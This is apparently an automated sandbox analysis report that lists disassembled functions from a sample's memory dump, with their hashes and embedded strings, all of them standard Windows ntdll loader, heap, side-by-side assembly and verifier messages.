                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                  • API String ID: 0-2368682639
                                                  • Opcode ID: 9193e223d0feaaddafff0552bacd6dc349c5af812480e1f4afa4dd699b16bcce
                                                  • Instruction ID: 3dba3a87d1c44744bbc06979526f521d117f02bbe3139ea72ef0e6e4c82c4882
                                                  • Opcode Fuzzy Hash: 9193e223d0feaaddafff0552bacd6dc349c5af812480e1f4afa4dd699b16bcce
                                                  • Instruction Fuzzy Hash: 7E817175A01348AFEB60CF9AC885BAEBBF5FB06718F10415AF905F7251D375AA40CB60
                                                  Function 018A29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018E2624
                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018E2602
                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018E2409
                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018E24C0
                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 018E261F
                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018E2498
                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018E2412
                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018E25EB
                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018E22E4
                                                  • @, xrefs: 018E259B
                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018E2506
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                  • API String ID: 0-4009184096
                                                  • Opcode ID: 5c1e80d07fcc19adc99b785453639e8e9eb2d54dad0d4fbbc4ea511986a63baa
                                                  • Instruction ID: 7969f94fdf0cbc3677eae800315d41e4760698cb6247bc6c5200d38d4795fd3a
                                                  • Opcode Fuzzy Hash: 5c1e80d07fcc19adc99b785453639e8e9eb2d54dad0d4fbbc4ea511986a63baa
                                                  • Instruction Fuzzy Hash: C90260B1D002299BEB31DB58CC84BDAB7B9AB55304F4041DAE709E7241EB709F84CF59
                                                  Function 01918B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                  • API String ID: 0-2515994595
                                                  • Opcode ID: 6098fd46b4a1adbb9ac10d37158709cabb454f39a6088658612f8eb0d9bf3347
                                                  • Instruction ID: 72778d39d92f694a41c10ac4ced7ad35bd78aa72286a656bb4c8ca3737572a07
                                                  • Opcode Fuzzy Hash: 6098fd46b4a1adbb9ac10d37158709cabb454f39a6088658612f8eb0d9bf3347
                                                  • Instruction Fuzzy Hash: 6851C0B160430A9BD725CF188884BABBBECFF94340F54491DEA9DC3244E770D688DB92
                                                  Function 01920274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 0-1700792311
                                                  • Opcode ID: b99053c8077b5a5a1ac4571dc92c852d6a13a8d420c206a3d9df5059a679ab93
                                                  • Instruction ID: 4e5da18cee02f70d90cdc2e91d724663539261cc82770e4aae825be0969490e0
                                                  • Opcode Fuzzy Hash: b99053c8077b5a5a1ac4571dc92c852d6a13a8d420c206a3d9df5059a679ab93
                                                  • Instruction Fuzzy Hash: F5D1F0316006A5DFDB22DFA8C440AADBFF9FF4A704F088059F5499B366D7399A81CB11
                                                  Function 018F89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • VerifierDebug, xrefs: 018F8CA5
                                                  • VerifierDlls, xrefs: 018F8CBD
                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018F8A3D
                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018F8A67
                                                  • VerifierFlags, xrefs: 018F8C50
                                                  • HandleTraces, xrefs: 018F8C8F
                                                  • AVRF: -*- final list of providers -*- , xrefs: 018F8B8F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                  • API String ID: 0-3223716464
                                                  • Opcode ID: 996e1e3548dcc1ba749e951ac12300f50863cefe3dc92bea1939278429d7007a
                                                  • Instruction ID: 5457bcc1a7a7b6f8798c16027b3052fb85e13df6564370751a11e85ae262b305
                                                  • Opcode Fuzzy Hash: 996e1e3548dcc1ba749e951ac12300f50863cefe3dc92bea1939278429d7007a
                                                  • Instruction Fuzzy Hash: C8911572645706AFE721EF2C8880B1AB7A8EF55798F05041CFB45EB291D7309F04C7A2
                                                  Function 0187EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                  • API String ID: 0-1109411897
                                                  • Opcode ID: f78a3b1b8ea340ae077afcb10ff274f285ce3d569d6c00be147e46f7e9709122
                                                  • Instruction ID: f46dd28850661df491d5ee62b400cde0272252fdf162286010d7543fa440acad
                                                  • Opcode Fuzzy Hash: f78a3b1b8ea340ae077afcb10ff274f285ce3d569d6c00be147e46f7e9709122
                                                  • Instruction Fuzzy Hash: BEA23674A0562A8FDB65DF19C888BA9BBB5AF85304F1442E9D91DE7690DB309FC0CF00
                                                  Function 018A63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-792281065
                                                  • Opcode ID: 35f3e52f16a88a9492f1978372ea89012eec0fbe912533b4e516d4af0597c05d
                                                  • Instruction ID: 7e800b344ae121da37a033915cc3afa6a67f3bc4b57d9fa377fa177a79375630
                                                  • Opcode Fuzzy Hash: 35f3e52f16a88a9492f1978372ea89012eec0fbe912533b4e516d4af0597c05d
                                                  • Instruction Fuzzy Hash: DF916970A05705DBFB35DF1CD888BA97BE1EB52B54F18011CE908EB285EB749B01C7A1
                                                  Function 0186645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018C9A2A
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018C9A11, 018C9A3A
                                                  • apphelp.dll, xrefs: 01866496
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 018C9A01
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018C99ED
                                                  • LdrpInitShimEngine, xrefs: 018C99F4, 018C9A07, 018C9A30
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-204845295
                                                  • Opcode ID: ec13fcd2dad198e932b7e125d0677bd74b9e6f0d025b3c6fcc8eaea8bf53c694
                                                  • Instruction ID: 0b59112b8ab5f670bc95f18970fe05725f1720544a0bcc97f1a86a258242b912
                                                  • Opcode Fuzzy Hash: ec13fcd2dad198e932b7e125d0677bd74b9e6f0d025b3c6fcc8eaea8bf53c694
                                                  • Instruction Fuzzy Hash: 9551AF71608345DFE725DB28D885AAB7BE9FB84B48F10091DF585D7261EA30EB04CB92
                                                  Function 018AC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018AC6C3
                                                  • Loading import redirection DLL: '%wZ', xrefs: 018E8170
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 018E8181, 018E81F5
                                                  • LdrpInitializeProcess, xrefs: 018AC6C4
                                                  • LdrpInitializeImportRedirection, xrefs: 018E8177, 018E81EB
                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 018E81E5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-475462383
                                                  • Opcode ID: 694c9a833c7686a85b136663c35bbc3914b41415b0cf60187af7baa1532528a7
                                                  • Instruction ID: cf9526f5f84c2c0ebdfaae92d2dce8b6af0b7d683ffe88ab257f936178621ac3
                                                  • Opcode Fuzzy Hash: 694c9a833c7686a85b136663c35bbc3914b41415b0cf60187af7baa1532528a7
                                                  • Instruction Fuzzy Hash: BE31E2B1748706ABE310EA2CD886E1A77D5EB95B14F04051CF944EB391E624EE04C7A3
                                                  Function 018A2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018E2180
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018E21BF
                                                  • SXS: %s() passed the empty activation context, xrefs: 018E2165
                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018E219F
                                                  • RtlGetAssemblyStorageRoot, xrefs: 018E2160, 018E219A, 018E21BA
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018E2178
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  • Opcode ID: 1ff6a39fa0b596138ba77604f7f4da459b297e7cf400b15074ec8d0d61c790cf
                                                  • Instruction ID: 474579df7c3c4da09b45c6f2cfbf684c56db945c4494eb38881e6fbf894f893d
                                                  • Opcode Fuzzy Hash: 1ff6a39fa0b596138ba77604f7f4da459b297e7cf400b15074ec8d0d61c790cf
                                                  • Instruction Fuzzy Hash: 4E31C63AA40215B7F7319A998C85F5A7BBEDB55B54F454059FB04E7240D270EB00C7A1
                                                  Function 018B096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 018B2DF0: LdrInitializeThunk.NTDLL ref: 018B2DFA
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018B0BA3
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018B0BB6
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018B0D60
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018B0D74
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                  • String ID:
                                                  • API String ID: 1404860816-0
                                                  • Opcode ID: 5555e82202a80a39ac57966ce886e0bf974ba4b481a222cad4b4c794352fa822
                                                  • Instruction ID: 53b68fa83949747e5f6ff69f8bb9a136dfcd0e417bdd44554a79aee05ce65921
                                                  • Opcode Fuzzy Hash: 5555e82202a80a39ac57966ce886e0bf974ba4b481a222cad4b4c794352fa822
                                                  • Instruction Fuzzy Hash: 3D4248719007159FDB21CF28C884BEAB7F5BF05314F1445A9E999EB342E770AA84CF61
                                                  Function 0187A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                  • API String ID: 0-379654539
                                                  • Opcode ID: 14285b15508ad9878cc94aec45042e3de004b71ea219b987537b6b115c64ded5
                                                  • Instruction ID: 9a37f22ac69ecdf8daa1f6ef5530b9742b8d92da3cf58ef4ed0f307d30ce1ac0
                                                  • Opcode Fuzzy Hash: 14285b15508ad9878cc94aec45042e3de004b71ea219b987537b6b115c64ded5
                                                  • Instruction Fuzzy Hash: 43C16775108386CFD729CF58C084B6EB7E4BF84708F08896AF995CB251E735DA49CB52
                                                  Function 018A8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018A8421
                                                  • @, xrefs: 018A8591
                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 018A855E
                                                  • LdrpInitializeProcess, xrefs: 018A8422
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1918872054
                                                  • Opcode ID: 655ec5b26febb9892ec0b98417e5200545c5ad028a97ebdb8052f888cba0b9c4
                                                  • Instruction ID: 9a40d925dec3fba2c27343bb91a72c9d2329807185c4067687376a2bdee3c4ca
                                                  • Opcode Fuzzy Hash: 655ec5b26febb9892ec0b98417e5200545c5ad028a97ebdb8052f888cba0b9c4
                                                  • Instruction Fuzzy Hash: F9917F71548345AFE721EF25CC84EABBAE8BB85744F80092DFA84D2151E734EB44CB62
                                                  Function 018A273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018E22B6
                                                  • SXS: %s() passed the empty activation context, xrefs: 018E21DE
                                                  • .Local, xrefs: 018A28D8
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018E21D9, 018E22B1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  • Opcode ID: 099455c0157dc542ddcceabe13abe35e458bd39a1358666c9f368362e6fcfe56
                                                  • Instruction ID: c7985b0902aee03200a292989dc942c90c15f6b48b0c5915f24d8d6b049821a2
                                                  • Opcode Fuzzy Hash: 099455c0157dc542ddcceabe13abe35e458bd39a1358666c9f368362e6fcfe56
                                                  • Instruction Fuzzy Hash: E0A1AD319002299BEB35CF68C888BA9B7B6BF59714F5841E9D908EB351D7309F80CF91
                                                  Function 018A4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018E342A
                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018E3456
                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018E3437
                                                  • RtlDeactivateActivationContext, xrefs: 018E3425, 018E3432, 018E3451
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                  • API String ID: 0-1245972979
                                                  • Opcode ID: 23c5cf2eb7c028632e22a28f988782f37850a783871665fec3de07b2ee470f69
                                                  • Instruction ID: 9c69bf6a45b721c56fe000d9cff24972b6579634456eedc18d2b69198f0ec704
                                                  • Opcode Fuzzy Hash: 23c5cf2eb7c028632e22a28f988782f37850a783871665fec3de07b2ee470f69
                                                  • Instruction Fuzzy Hash: 7A6121326407129BEB228F1CC885B2AB7E1FFA0B14F58852DED55DB240D7B4EE01CB91
                                                  Function 018764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018D0FE5
                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018D1028
                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018D10AE
                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018D106B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                  • API String ID: 0-1468400865
                                                  • Opcode ID: fb1fa63755fec8fa23b9d5e3f00c238aa15723774719ce1787a2f89f72619254
                                                  • Instruction ID: 1d2ab78aa409197e9af874448993450729d9861739bf1692afd976a19cdd4874
                                                  • Opcode Fuzzy Hash: fb1fa63755fec8fa23b9d5e3f00c238aa15723774719ce1787a2f89f72619254
                                                  • Instruction Fuzzy Hash: EF71CFB19047059FDB21EF18C884B9B7FA8AF55B64F100469F948CB286E734D688DBD2
                                                  Function 0189245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018DA9A2
                                                  • apphelp.dll, xrefs: 01892462
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018DA992
                                                  • LdrpDynamicShimModule, xrefs: 018DA998
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  • Opcode ID: 9f2c78cde34a3476e912ea5c4a1af8dab49db7c62aec8b08a3c221f9910c8de0
                                                  • Instruction ID: 6fc181c209aaff6aa571341e057ca7ffa562f26a7d7dd55260a6ebb552aad637
                                                  • Opcode Fuzzy Hash: 9f2c78cde34a3476e912ea5c4a1af8dab49db7c62aec8b08a3c221f9910c8de0
                                                  • Instruction Fuzzy Hash: FC317C75600302FBDB359F6DC885E6A77B5FB80B04F26001DE915E7265DBB09B41C7A1
                                                  Function 018829A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP: , xrefs: 01883264
                                                  • HEAP[%wZ]: , xrefs: 01883255
                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0188327D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                  • API String ID: 0-617086771
                                                  • Opcode ID: 553a07554701f699428d6fc90ec9d6e01123be6ce031012cead43a4297315fd8
                                                  • Instruction ID: ad611c55438b543e0cc3f4e230288ade57163f191f0cb978cef0228ce9e79a0d
                                                  • Opcode Fuzzy Hash: 553a07554701f699428d6fc90ec9d6e01123be6ce031012cead43a4297315fd8
                                                  • Instruction Fuzzy Hash: 6792AB70A042499FDB25DF68C444BAEBBF2FF48704F188069E859EB392D735AA41CF50
                                                  Function 01880770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: d5d9867ed2a3b36d80768fd19f0cbcb2d345f33181701da144ef6ed3c3f36dd6
                                                  • Instruction ID: 90d183a7d22c55321e7e0e482c01ca7d4a2151fa59235ed2111f82ff129e89d2
                                                  • Opcode Fuzzy Hash: d5d9867ed2a3b36d80768fd19f0cbcb2d345f33181701da144ef6ed3c3f36dd6
                                                  • Instruction Fuzzy Hash: 4BF1BC30A0060ADFEB25EF68C894B6ABBF5FF44704F148169E416DB391D734EA85CB91
                                                  Function 01896962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $@
                                                  • API String ID: 0-1077428164
                                                  • Opcode ID: 272ba9bd871386cb1ce44121dede2a89211496a9ade2e32068fd3731e2d1b234
                                                  • Instruction ID: 37ed8d13a1a870ce1540bbef3213e2b3d55619de499b75e31feae0dd1c0c1f2e
                                                  • Opcode Fuzzy Hash: 272ba9bd871386cb1ce44121dede2a89211496a9ade2e32068fd3731e2d1b234
                                                  • Instruction Fuzzy Hash: C8C280716183459FDB25CF29C881BABBBE5BF88714F08892DF989C7241E734DA05CB52
                                                  Function 0186A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, Offset: 01840000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1840000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                  • API String ID: 0-2779062949
                                                  • Opcode ID: 2e3dc6dbf7a835eeebb7d62312fc5ad9501d1f72e7e5aeaf7fb1b4850095a337
                                                  • Instruction ID: f71dd8388e130d1412420572fea00cb6f5901528a56ae3404b964a4fe5ab61b4
                                                  • Opcode Fuzzy Hash: 2e3dc6dbf7a835eeebb7d62312fc5ad9501d1f72e7e5aeaf7fb1b4850095a337
